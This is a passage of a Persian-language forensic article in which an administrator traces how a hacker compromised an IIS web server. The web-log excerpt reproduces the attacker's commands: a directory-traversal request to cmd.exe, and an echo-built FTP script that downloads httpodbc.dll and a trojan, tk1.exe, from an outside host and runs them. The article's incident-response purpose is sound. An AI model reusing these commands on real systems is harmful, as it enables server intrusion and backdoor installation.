‫‪ NT/2K/XP‬ﺍﺟـﺮﺍ ﻭ ﻧﺼـﺐ ﻛﻨـﻴﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﺭﻭﻳﺎﻫﺎﻱ ﻳﻚ ﻫﻜﺮ ﺭﺍ ﺑﻪ ﺣﻘﻴﻘﺖ ﺗﺒﺪﻳﻞ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﻧﺼﺐ ﻛﺮﺩﻥ ﻳﻚ ‪ Root Kit‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲ‪ ،‬ﻫﻜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻄﻮﺭ ﺳﺎﺩﻩﺍﻱ ﺗﻀﻤﻴﻦ ﻛﻨﺪ ﻛﻪ‬
‫‪ Root Kit‬ﺣﺘﻲ ﺩﺭ ﺻﻮﺭﺕ ‪ Reboot‬ﺷﺪﻥ ﺳﺮﻭﺭ ﻫﻢ ﺍﺟﺮﺍ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬

‫ﺷﻜﻞ ‪٢‬‬
‫ﻧﺘﺎﻳﺞ ﺑﺎﺯﮔﺸﺘﻲ ‪ NetStat‬ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﻳﺲ ﻫﻚ ﺷﺪﻩ‪.‬‬

‫ﺩﺭ ﻧﻬﺎﻳـﺖ ﺷـﺮﻭﻉ ﺑـﻪ ﻛﺎﻭﺵ ﺩﺭﻭﻥ ﺳﺮﻭﺭ ﻛﺮﺩﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﻣﻲﺗﻮﺍﻥ ﭼﮕﻮﻧﮕﻲ ﻭﺭﻭﺩ ﻫﻜﺮ ﺭﺍ ﺑﺪﺳﺖ‬
‫ﺁﻭﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﺎ ‪ Log‬ﻫﺎﻱ ﺳﺮﻭﺭ ﻭﺏ ﺷﺮﻭﻉ ﻛﺮﺩﻩ ﻭ ﻭﺭﻭﺩﻱﻫﺎﻳﻲ ﺭﺍ ﺩﺭ ﻟﻴﺴﺖ ‪ ١‬ﭘﻴﺪﺍ ﻛﺮﺩﻡ‪.‬‬

‫]‪209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬

‫‪4‬‬ ‫‪www.WebSecurityMgz.com‬‬
‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫]‪859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, [ccc‬‬


‫‪/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe,‬‬

‫]‪209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


‫]‪83250, 270, 148, 200, 0, GET, /scripts/script.exe, [ccc‬‬
‫>‪/c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>tmp2&&[email protected]‬‬
‫‪>[ccc]tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye‬‬
‫‪>>[ccc]tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd,‬‬

‫]‪209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


‫]‪703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, [ccc‬‬
‫]‪MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%[ccc‬‬
‫‪2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,‬‬

‫]‪209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


‫]‪828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, [ccc‬‬
‫]‪MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%[ccc‬‬
‫‪2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,‬‬

‫ﺑـﺎ ﺩﺭ ﻧﻈـﺮ ﮔﺮﻓﺘﻦ ﻭﺭﻭﺩﻱﻫﺎ ﺑﻪ ﺻﻮﺭﺕ ﻳﻚ ﻣﺴﻴﺮ‪ ،‬ﺑﻪ ﭘﻮﺷﻪﺍﻱ ﻣﺸﺨﺺ ﺭﺳﻴﺪﻩ ﻭ ﺩﺭ ﺁﻧﺠﺎ ﺳﻪ‬
‫ﻓـﺎﻳﻞ ‪ tmp2.cmd ، tmp2‬ﻭ ‪ httpobdc.dll‬ﺭﺍ ﻳﺎﻓﺘﻢ‪ .‬ﺩﻭ ﻓﺎﻳﻞ ﺍﻭﻝ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ‪ NotePad‬ﺑﺎﺯ ﻛﺮﺩﻩ ﻭ‬
‫ﻓﻬﻤـﻴﺪﻡ ﻛـﻪ ﺍﺯ ﺁﻥ ﺩﻭ‪ ،‬ﻳﻜـﻲ ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﺍﺕ ‪ Ftp‬ﺑﻮﺩﻩ ﻭ ﺩﻳﮕﺮﻱ ﻳﻚ ﻓﺎﻳﻞ ﺩﺳﺘﻪﺍﻱ )‪ (Batch‬ﻣﻲﺑﺎﺷﺪ ﻛﻪ‬
‫ﻓﺎﻳﻞﻫﺎﻱ ‪ tk1.exe‬ﻭ ‪) httpodbc.dll‬ﻓﺎﻳﻠﻲ ﻛﻪ ﻋﻤﻮﻣﺎ ﺗﻮﺳﻂ ﻛﺮﻡ ‪ Nimda‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ(‬
‫ﺭﺍ ‪ download‬ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﺍﺕ ‪ Ftp‬ﺑﻪ ﺳﺮﻭﺭﻱ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﺯ ﺷﻨﺎﺳﻪﺍﻱ‬
‫ﻋﻤﻮﻣـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ ،‬ﻣﻦ ﻫﻢ ﺑﻪ ﺳﺮﻭﺭ ‪ Ftp‬ﻛﻪ ﻫﻨﻮﺯ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩ ﻭﺍﺭﺩ ﺷﺪﻩ ﻭ ﻳﻚ ﻛﭙﻲ ﺍﺯ ﻓﺎﻳﻞ‬
‫ﺑﺮﺍﻱ ﻛﻨﺪ ﻭ ﻛﺎﻭﻫﺎﻱ ﺁﻳﻨﺪﻩ ﺧﻮﺩ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻡ‪.‬‬
‫ﺑـﺎ ﺍﺩﺍﻣـﻪ ﺟﺴﺘﺠﻮﻱ ﺧﻮﺩ ﺩﺭ ﺳﺮﻭﺭ‪ ،‬ﺑﺮﺍﻳﻢ ﺍﺛﺒﺎﺕ ﺷﺪ ﻛﻪ ﻣﺸﺨﺼﺎ ﻫﻚ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺩﻟﻴﻞ ‪Offline‬‬
‫ﺑـﻮﺩﻥ ﺳـﺮﻭﺭ ﻭﺏ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯ ﺑﻮﺩﻥ ﺩﻭ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﺭ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺗﺼﻮﺭ ﺑﺮ ﺍﺳﺎﺱ‬
‫ﺍﻳـﻦ ﻭﺍﻗﻌﻴـﺖ ﺷـﻜﻞ ﮔﺮﻓـﺖ ﻛـﻪ ﻋﻤﻞ ‪ Download‬ﻓﺎﻳﻞ ‪ tk1.exe‬ﺛﺎﻧﻴﻪﻫﺎﻳﻲ ﻗﺒﻞ ﺍﺯ ﺧﺎﻟﻲ ﺷﺪﻥ ‪ log‬ﻓﺎﻳﻞ‬
‫ﺳـﺮﻭﺭ ﻭﺏ ﺭﺥ ﺩﺍﺩﻩ ﺑـﻮﺩ‪ ،‬ﻫﻤﭽﻨﻴﻦ ﺳﺮﻭﺭ ‪ Ftp‬ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻮﻗﻊ ﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ‪ 65130‬ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩ‪،‬‬
‫ﻳﻚ ﻋﻤﻞ "‪ "TK DISTRO‬ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﺍﺩ‪.‬‬
‫ﺩﺭ ﺍﻳـﻦ ﺯﻣـﺎﻥ‪ ،‬ﻣـﻦ ﺁﻣـﺎﺩﻩ ﺭﻓﺘـﻦ ﺑـﻪ ﺧﺎﻧـﻪ ﺷﺪﻡ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﺘﺎﻳﺞ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ‪ NetStat‬ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺟﺪﻳﺪ ﻛﺴﺐ ﺷﺪﻩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺎﻳﻞ ﻣﺒﻬﻢ ‪ TK‬ﺣﺪﺱ ﻣﻲﺯﺩﻡ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﺨﺼﻮﺹ ﻫﻚ‪ ،‬ﻳﻚ ﺍﺳﺐ‬
‫ﺗـﺮﻭﺍﻱ ﻣﺮﻛـــﺐ ‪ Ftp/Back Door/IRC‬ﺍﺳـﺖ ﻛـﻪ ﻫﻤﮕـﻲ ﺩﺭ ﻳـﻚ ﻓـﺎﻳﻞ ﺩﻗﻴﻖ )‪ (tk1.exe‬ﺟﻤﻊﺁﻭﺭﻱ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻳﻦ ﺗﺌﻮﺭﻱ ﺑﻪ ﻧﻈﺮ ﻣﻌﺘﺒﺮ ﻣﻲﺭﺳﻴﺪ‪.‬‬

‫‪5‬‬ ‫‪www.WebSecurityMgz.com‬‬

You might also like